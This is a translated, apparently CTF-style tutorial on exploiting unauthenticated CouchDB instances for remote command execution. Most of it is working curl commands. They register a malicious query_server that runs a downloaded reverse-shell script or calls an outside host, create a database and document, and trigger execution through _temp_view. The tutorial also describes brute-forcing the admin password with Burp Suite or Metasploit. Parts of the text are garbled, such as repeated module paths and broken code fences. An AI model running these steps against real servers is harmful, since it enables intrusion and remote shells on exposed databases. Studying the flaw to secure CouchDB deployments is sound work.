Background
CouchDB is an open source database management system, document-oriented, accessible through RESTful JavaScript Object Notation (JSON) API. CouchDB can be installed on most POSIX systems, including Linux and Mac OS X.
Vulnerabilities Introduction
Couchdb default will open Restful API interface port 5984, and if they would use SSL listening port in 6984, for the management of the database. Its HTTP Server is enabled by default when no verification, and binding in 0.0.0.0, all users can access the API by causing unauthorized access.
Use nmap scan can find banner of information couchdb
Execute commands need admin privileges, if there is an unauthorized database can be directly utilized, if account authentication you need to find ways to get admin password, of course, to go blasting through burpsuit / _utils /, can also metasploit the auxiliary / scanner / Couchdb / Couchdb / Couchdb / Couchdb_login direct blasting CouchDB module provides a visual interface tool that runs in the browser "http://127.0.0.1:5984/_utils/", you can see the interface shown below.
Exploit
For example there is the case here account authentication, we need to use the admin log on and get cookie, and then use the curl command to interact with the api, implement database operations
Remote Command Execution Example
- New query_server configuration, the write command to be executed;
- Create a temporary database and temporary table, a record is inserted;
- Query_server call processing data
curl -X PUT 'http://192.168.199.181:5984/_config/query_servers/cmd' -d '"python /tmp/back.py"' -H "Cookie: AuthSession=YWRtaW46NTc5QTRGMjc6VKTKwNEud9fFchzR-HtOrjM5Cg4"
curl -X PUT 'http://192.168.199.181:5984/teeest' -H "Cookie: AuthSession=YWRtaW46NTc5QTRGMjc6VKTKwNEud9fFchzR-HtOrjM5Cg4"```
curl -X PUT 'http://192.168.199.181:5984/teeest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}' -H "Cookie: AuthSession=YWRtaW46NTc5QTRGMjc6VKTKwNEud9fFchzR-HtOrjM5Cg4"```
curl -X POST 'http://192.168.199.181:5984/teeest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json' -H "Cookie: AuthSession=YWRtaW46NTc5QTRGMjc6VKTKwNEud9fFchzR-HtOrjM5Cg4"
Remote download rebound script successfully listening to the download request to add execute permissions to execute scripts rebound getshell, read flag
Similarly, you can not log in to obtain Cookie, into the account password directly in the curl request is also possible, like this, implementation of the results is the same, this method may be more convenient point of it
root@Urahara:~# curl -X PUT 'admin:[email protected]:5984/_config/query_servers/cmd' -d '"curl http://192.168.199.140/flag"'
"curl http://192.168.199.140/flag"
root@Urahara:~# curl -X PUT 'admin:[email protected]:5984/wa'
{"ok":true}
root@Urahara:~# curl -X PUT 'admin:[email protected]:5984/wa/haha' -d '{"_id":"770895a97726d5ca6d70a22173005c7a"}'{"ok":true,"id":"haha","rev":"1-967a00dff5e02add41819138abb3284d"}
root@Urahara:~# curl -X POST 'admin:[email protected]:5984/wa/_temp_view?limit=14' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'
reference
CouchDB unauthorized access vulnerabilities to execute arbitrary system commands
CouchDB Unauthorized Access Vulnerability cause the system to execute command
Original: Big Box Command Execution via Remote CouchDB